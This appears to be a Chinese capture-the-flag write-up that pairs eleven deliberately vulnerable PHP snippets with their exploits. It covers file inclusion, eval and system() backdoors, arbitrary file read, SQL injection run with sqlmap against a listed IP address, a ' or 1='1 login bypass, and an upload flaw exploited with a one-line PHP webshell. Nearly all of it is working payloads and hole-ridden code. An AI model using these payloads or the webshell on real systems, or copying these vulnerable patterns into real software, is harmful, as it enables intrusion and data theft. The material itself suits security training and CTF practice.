1.文件包含漏洞
源码
<?php $file=$_GET['file']; include $file; ?>
漏洞利用
/about.php?file=../flag
2.代码执行漏洞
源码
@eval($_REQUEST['c']);
漏洞利用
/config.php?c=system('cat ../flag');
3.任意文件读取漏洞
源码
<?php include 'header.php'; $file_path = $_GET['path']; if(file_exists($file_path)){ $fp = fopen($file_path,"r"); $str = fread($fp,filesize($file_path)); echo $str = str_replace("\r\n","<br />",$str); } ?>
漏洞利用
/contact.php?path=../flag
4.代码执行漏洞
源码
<?php $shell=$_POST['shell']; system($shell); if($shell !=""){ exit(); } ?>
漏洞利用
ls / # app bin boot data dev etc flag home lib lib64 media mnt opt proc root run run.sh sbin srv sys tmp usr var web cat /flag
5.代码执行漏洞
源码
<?php include 'header.php'; @eval($_REQUEST['aa']); ?>
漏洞利用
/index.php?aa=system('cat ../flag');
6.SQL注入漏洞
源码
<?php include 'header.php'; include_once('config.php'); if (!empty($_GET['id'])) { $id=$_GET['id']; $query = "SELECT * FROM news WHERE id=$id"; $data = mysqli_query($dbc,$query); } $com = mysqli_fetch_array($data); ?>
漏洞利用
#sqlmap检测 python sqlmap.py -u http://47.74.13.136:8802/search.php?id=1 #列出所有数据库 python sqlmap.py -u http://47.74.13.136:8802/search.php?id=1 --dbs #列出指定数据库的表 python sqlmap.py -u http://47.74.13.136:8802/search.php?id=1 -D cyber --tables
7.代码执行漏洞
源码
<?php $shell=$_POST['shell']; system($shell); if($shell !=""){ exit(); } ?>
漏洞利用
ls / # app bin boot data dev etc flag home lib lib64 media mnt opt proc root run run.sh sbin srv sys tmp usr var web cat /flag
8.万能钥匙
源码
<?php include_once('config.php'); if (!empty($_POST['username'])) { $user=$_POST['username']; $pass=$_POST['password']; $query = "SELECT * FROM admin WHERE user_name='{$user}' and user_pass='{$pass}' "; $data = mysqli_query($dbc,$query); if (mysqli_num_rows($data) == 1) { $row = mysqli_fetch_array($data); $_SESSION['username'] = $row['user_name']; header('Location: ./admin/index.php'); }else{ echo '<hr/><center><br/>用户名:',$user,'<br/>密码:',$pass,'<br/><br/>用户名密码错误</center>'; } } ?>
漏洞利用
' or 1='1
9.信息泄露
源码
<h3>flag:<?php system("cat /flag")?></h3>
10.任意命令执行
源码
<?php $p=$_GET['p']; echo $p; $q=exec($p); var_dump($q); ?>
漏洞利用
/admin/header.php?p=cat /flag
11.文件上传漏洞
源码
$error=$_FILES['pic']['error']; $tmpName=$_FILES['pic']['tmp_name']; $name=$_FILES['pic']['name']; $size=$_FILES['pic']['size']; $type=$_FILES['pic']['type']; try{ if($name!=="") { $name1=substr($name,-4); if(is_uploaded_file($tmpName)){ $time=time(); $rootpath='./upload/'.$time.$name1; $file=fopen($tmpName, "r") or die('No such file!'); $content=fread($file, filesize($tmpName)); if(strstr($content,'fuck')){ exit("<script language='JavaScript'>alert('You should not do this!');window.location='index.php?page=submit'</script>"); } if(!move_uploaded_file($tmpName,$rootpath)){ echo "<script language='JavaScript'>alert('文件移动失败!');window.location='index.php?page=submit'</script>"; exit; } } echo "上传成功:/upload/".$time.$name1; } } catch(Exception $e) { echo "ERROR"; }
漏洞利用
#传入一句话木马1.php <?php @eval($_REQUEST['c']);?> /admin/upload/1718338939.php?c=system('cat /flag');
